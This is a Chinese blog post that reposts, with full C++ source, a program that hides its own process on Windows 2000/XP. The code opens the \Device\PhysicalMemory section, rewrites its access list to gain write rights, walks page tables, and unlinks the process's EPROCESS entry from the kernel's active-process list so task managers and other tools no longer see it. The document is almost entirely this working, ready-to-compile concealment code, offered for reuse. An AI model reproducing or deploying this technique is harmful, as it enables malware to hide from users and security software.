网上流传的《在2000和XP下隐藏进程》这篇文章,我想找原始出处却没有一篇有注明的,想必文章发表时没有附带出处,失传了吧。我整理了一下这篇文章里的代码,在VC2008下调试通过,在XP SP2下测试可用,确实隐藏掉自身进程了。程序是通过修改物理内存,似乎是摘除自身在系统中的信息,来实现隐藏的。兼容性也就比较差了,只能在2000和XP下有效,如果有朋友研究到2003及以后版本系统的方案,希望可以公开交流交流。
#include
"
stdafx.h
"
#include
<
windows.h
>
#include
<
tchar.h
>
#include
<
Aclapi.h
>
#define
dprintf _tprintf
//
A process has requested access to an object, but has not been granted those access rights.
#define
STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
#define
NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef
struct
_UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
}
UNICODE_STRING,
*
PUNICODE_STRING;
typedef
struct
_OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR
PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE
}
OBJECT_ATTRIBUTES,
*
POBJECT_ATTRIBUTES;
typedef NTSTATUS (NTAPI
*
NTOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (NTAPI
*
RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
bool
InitNTDLL();
void
CloseNTDLL();
bool
SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
HANDLE OpenPhysicalMemory();
void
ClosePhysicalMemory();
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
ULONG GetData(PVOID addr);
bool
SetData(PVOID addr, ULONG data);
bool
HideCurrentProcess();
BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable
=
TRUE);
HMODULE g_hNtDLL
=
NULL;
NTOPENSECTION NtOpenSection
=
NULL;
RTLINITUNICODESTRING RtlInitUnicodeString
=
NULL;
OSVERSIONINFO g_osvi
=
{0}
;
HANDLE g_hMPM
=
NULL;
PVOID g_pMapPhysicalMemory
=
NULL;
void
_tmain(
int
argc, _TCHAR
*
argv[])
{
_tsetlocale(0, _T("chs"));
_tprintf(_T("隐藏当前进程%s\n"),
HideCurrentProcess() ? _T("成功") : _T("失败"));
_tprintf(_T("\n请按任意键退出. . ."));
_getwch();
}
bool
InitNTDLL()
{
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (g_hNtDLL == NULL)
return false;
NtOpenSection = (NTOPENSECTION)GetProcAddress(g_hNtDLL, "NtOpenSection");
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
return (NtOpenSection != NULL && RtlInitUnicodeString != NULL);
}
void
CloseNTDLL()
{
if (g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
}
}
bool
SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PACL pNewDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
DWORD dwResult = ERROR_SUCCESS;
EXPLICIT_ACCESS ea;
dwResult = GetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&pSD);
if (dwResult != ERROR_SUCCESS)
{
dprintf(_T("GetSecurityInfo Error=%lu\n"), dwResult);
goto __End;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = _T("CURRENT_USER");
dwResult = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if (dwResult != ERROR_SUCCESS)
{
dprintf(_T("SetEntriesInAcl Error=%lu\n"), dwResult);
goto __End;
}
dwResult = SetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
pNewDacl,
NULL);
if (dwResult != ERROR_SUCCESS)
{
dprintf(_T("SetSecurityInfo Error=%lu\n"), dwResult);
goto __End;
}
__End:
if (pDacl != NULL)
LocalFree(pDacl);
if (pNewDacl != NULL)
LocalFree(pNewDacl);
if (pSD != NULL)
LocalFree(pSD);
return (dwResult == ERROR_SUCCESS);
}
HANDLE OpenPhysicalMemory()
{
HANDLE hResult = NULL;
NTSTATUS status = -1;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory = 0;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&g_osvi);
if (g_osvi.dwMajorVersion == 5)
{
switch (g_osvi.dwMinorVersion)
{
case 0: // 2000
PhyDirectory = 0x30000;
break;
case 1: // XP
case 2: // 2003
PhyDirectory = 0x39000;
break;
}
}
else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT
{
PhyDirectory = 0x30000;
}
if (PhyDirectory == 0)
{
dprintf(_T("不支持当前操作系统, 版本: %lu.%lu.%lu\n"),
g_osvi.dwMajorVersion,
g_osvi.dwMinorVersion,
g_osvi.dwBuildNumber);
goto __End;
}
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
dprintf(_T("NtOpenSection access denied\n"));
status = NtOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
if (NT_SUCCESS(status))
{
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
}
}
if (!NT_SUCCESS(status))
{
dprintf(_T("NtOpenSection Error=0x%X\n"), (DWORD)status);
goto __End;
}
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
if (g_pMapPhysicalMemory == NULL)
{
dprintf(_T("MapViewOfFile Error=%lu\n"), GetLastError());
goto __End;
}
hResult = g_hMPM;
__End:
return hResult;
}
void
ClosePhysicalMemory()
{
if (g_pMapPhysicalMemory != NULL)
{
UnmapViewOfFile(g_pMapPhysicalMemory);
g_pMapPhysicalMemory = NULL;
}
if (g_hMPM != NULL)
{
CloseHandle(g_hMPM);
g_hMPM = NULL;
}
}
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr;
ULONG PGDE = BaseAddress[VAddr >> 22];
ULONG PTE = 0;
ULONG PAddr = 0;
ULONG tmp = PGDE & 0x00000080;
if ((PGDE & 1) == 0)
return NULL;
if (tmp != 0)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE & 0xFFFFF000, 0x1000);
if (!PGDE)
return NULL;
PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12];
if ((PTE & 1) == 0)
{
UnmapViewOfFile((PVOID)PGDE);
return NULL;
}
PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
ULONG GetData(PVOID addr)
{
ULONG ret = 0;
ULONG phys = 0;
PULONG tmp = 0;
phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
if (!phys)
{
_tprintf(_T("GetData LinearToPhys return 0\n"));
return ret;
}
tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
if (tmp != NULL)
{
ret = tmp[(phys & 0xFFF) >> 2];
UnmapViewOfFile(tmp);
}
else
{
_tprintf(_T("GetData MapViewOfFile return NULL\n"));
}
return ret;
}
bool
SetData(PVOID addr, ULONG data)
{
ULONG phys = 0;
PULONG tmp = 0;
phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
if (!phys)
{
_tprintf(_T("SetData LinearToPhys return 0\n"));
return false;
}
tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
if (tmp == NULL)
{
_tprintf(_T("SetData MapViewOfFile return NULL\n"));
return false;
}
tmp[(phys & 0xFFF) >> 2] = data;
UnmapViewOfFile(tmp);
return true;
}
bool
HideCurrentProcess()
{
ULONG fw = 0;
ULONG bw = 0;
ULONG thread = 0;
ULONG process = 0;
static bool bHidden = false;
if (bHidden)
return bHidden;
EnablePrivilege(SE_SECURITY_NAME);
if (!InitNTDLL() || OpenPhysicalMemory() == NULL)
goto __End;
thread = GetData((PVOID)0xFFDFF124); // Read the ETHREAD struct
if (!thread)
{
_tprintf(_T("thread=0\n"));
goto __End;
}
process = GetData((PVOID)(thread + 0x44)); // Read the EPROCESS struct
if (!process)
{
_tprintf(_T("process=0\n"));
goto __End;
}
if (g_osvi.dwMajorVersion == 5)
{
switch (g_osvi.dwMinorVersion)
{
case 0: // 2000
fw = GetData((PVOID)(process + 0xA0));
bw = GetData((PVOID)(process + 0xA4));
break;
case 1: // XP
fw = GetData((PVOID)(process + 0x88));
bw = GetData((PVOID)(process + 0x8C));
break;
case 2: // 2003
fw = GetData((PVOID)(process + 0x8A));
bw = GetData((PVOID)(process + 0x8E));
break;
}
}
else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT
{
fw = GetData((PVOID)(process + 0x98));
bw = GetData((PVOID)(process + 0x9C));
}
if (fw && bw)
bHidden = (SetData((PVOID)(fw + 4), bw) && SetData((PVOID)bw, fw));
else
_tprintf(_T("fw=%lu, bw=%lu\n"), fw, bw);
__End:
CloseNTDLL();
ClosePhysicalMemory();
EnablePrivilege(SE_SECURITY_NAME, FALSE);
return bHidden;
}
BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable)
{
BOOL bReturn = FALSE;
HANDLE hToken = NULL;
LUID uidName = {0};
TOKEN_PRIVILEGES tpToken = {0};
DWORD dwReturn = 0;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return bReturn;
if (!LookupPrivilegeValue(NULL, pPrivName, &uidName))
{
CloseHandle(hToken);
return bReturn;
}
tpToken.PrivilegeCount = 1;
tpToken.Privileges[0].Luid = uidName;
tpToken.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : SE_PRIVILEGE_REMOVED;
bReturn = AdjustTokenPrivileges(hToken, FALSE, &tpToken, sizeof(TOKEN_PRIVILEGES), NULL, &dwReturn);
CloseHandle(hToken);
return bReturn;
}
951
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
